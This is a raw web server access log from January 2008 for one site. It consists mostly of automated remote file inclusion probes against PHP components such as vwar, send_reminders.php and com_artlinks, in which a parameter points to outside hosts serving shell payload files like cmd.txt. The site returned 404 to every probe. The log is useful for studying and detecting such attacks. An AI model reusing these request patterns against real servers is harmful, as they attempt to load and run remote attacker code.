81.19.78.111 - - [10/Jan/2008:04:04:06 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.19.78.111 - - [10/Jan/2008:04:04:06 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.19.78.111 - - [10/Jan/2008:04:05:09 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.19.78.111 - - [10/Jan/2008:04:05:28 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.19.78.111 - - [10/Jan/2008:04:05:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.19.139 - - [10/Jan/2008:04:07:16 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [10/Jan/2008:04:07:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:08:04 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.19.139 - - [10/Jan/2008:04:08:25 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [10/Jan/2008:04:08:25 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.228.126.165 - - [10/Jan/2008:04:08:35 -0800] "GET /teatro/pub/pub08_comments.php?basePath=http://egliberal.com/ash/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
66.228.126.165 - - [10/Jan/2008:04:08:35 -0800] "GET /logs/teatro/pub/pub08_comments.php?basePath=http://egliberal.com/ash/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
193.136.19.139 - - [10/Jan/2008:04:09:44 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
192.5.166.40 - - [10/Jan/2008:04:10:39 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
192.5.166.40 - - [10/Jan/2008:04:10:39 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
192.5.166.40 - - [10/Jan/2008:04:10:40 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:03 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:04 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:31 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:31 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:34 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:35 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:38 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:38 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:04:12:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.99.83 - - [10/Jan/2008:04:14:12 -0800] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:17:58 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:17:58 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:19:10 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.19.78.111 - - [10/Jan/2008:04:23:25 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.19.78.111 - - [10/Jan/2008:04:23:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.19.78.111 - - [10/Jan/2008:04:23:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:04:27:50 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:04:29:22 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.74.112.181 - - [10/Jan/2008:04:29:30 -0800] "GET /logs/access_071229.log HTTP/1.1" 200 314379 "http://alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=phrase&itag=crv&l=en&ics=utf-8&cs=utf8&wf[n]=3&wf[0][r]=%20&wf[0][q]=&wf[0][w]=&wf[1][r]=%20&wf[1][q]=&wf[1][w]=&wf[2][r]=-&wf[2][q]=&wf[2][w]=&dincl=&dexcl=&geo=an&doctype=text&dfr[u]=on&dfr[d]=1&dfr[m]=12&dfr[y]=2007&dto[u]=on&dto[d]=1&dto[m]=1&dto[y]=2008&hits=10&q=yahoo.com&o=30" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:30:59 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.19.139 - - [10/Jan/2008:04:31:11 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [10/Jan/2008:04:31:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [10/Jan/2008:04:31:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.79 - - [10/Jan/2008:04:35:06 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:38:46 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:38:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:38:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:04:38:55 -0800] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:04:39:22 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.222.23.58 - - [10/Jan/2008:04:45:51 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:48:05 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [10/Jan/2008:04:48:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://valedeletras.museu-da-pessoa.net/img/wiki/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.175 - - [10/Jan/2008:04:52:40 -0800] "GET /components/com_artlinks/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.175 - - [10/Jan/2008:04:52:40 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.175 - - [10/Jan/2008:04:52:40 -0800] "GET /errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.245.170.43 - - [10/Jan/2008:04:53:23 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.245.170.43 - - [10/Jan/2008:04:53:33 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.245.170.43 - - [10/Jan/2008:04:54:39 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:04:55:06 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:04:55:07 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:04:55:43 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:04:55:44 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:04:55:44 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.189.215.180 - - [10/Jan/2008:04:58:59 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.215.180 - - [10/Jan/2008:04:59:00 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.215.180 - - [10/Jan/2008:04:59:00 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:00:01 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.64.37.240 - - [10/Jan/2008:05:00:03 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.37.240 - - [10/Jan/2008:05:00:03 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.37.240 - - [10/Jan/2008:05:00:03 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:03:21 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:03:21 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Jan/2008:05:03:23 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
206.222.23.58 - - [10/Jan/2008:05:07:18 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [10/Jan/2008:05:07:18 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:05:07:34 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://vangeenen.demon.nl/images/jaarwisseling2004/pages/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:05:07:36 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://vangeenen.demon.nl/images/jaarwisseling2004/pages/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
64.38.24.138 - - [10/Jan/2008:05:11:42 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://apm.hk/content/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.24.138 - - [10/Jan/2008:05:11:43 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://apm.hk/content/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.24.138 - - [10/Jan/2008:05:11:43 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://apm.hk/content/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.215.230.140 - - [10/Jan/2008:05:14:04 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [10/Jan/2008:05:14:04 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [10/Jan/2008:05:14:05 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:14:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/images/al.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.48 - - [10/Jan/2008:05:19:36 -0800] "GET /megumi/earrings/?D=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.231.2 - - [10/Jan/2008:05:19:59 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.99.83 - - [10/Jan/2008:05:20:55 -0800] "GET /logs/access_071221.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.83 - - [10/Jan/2008:05:20:55 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.83 - - [10/Jan/2008:05:20:56 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.150.12 - - [10/Jan/2008:05:21:23 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [10/Jan/2008:05:21:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [10/Jan/2008:05:21:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:24:32 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:24:32 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:24:32 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:25:36 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:25:36 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:25:36 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:25:54 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/images/al.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:05:25:54 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/images/al.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:05:27:00 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:05:27:01 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
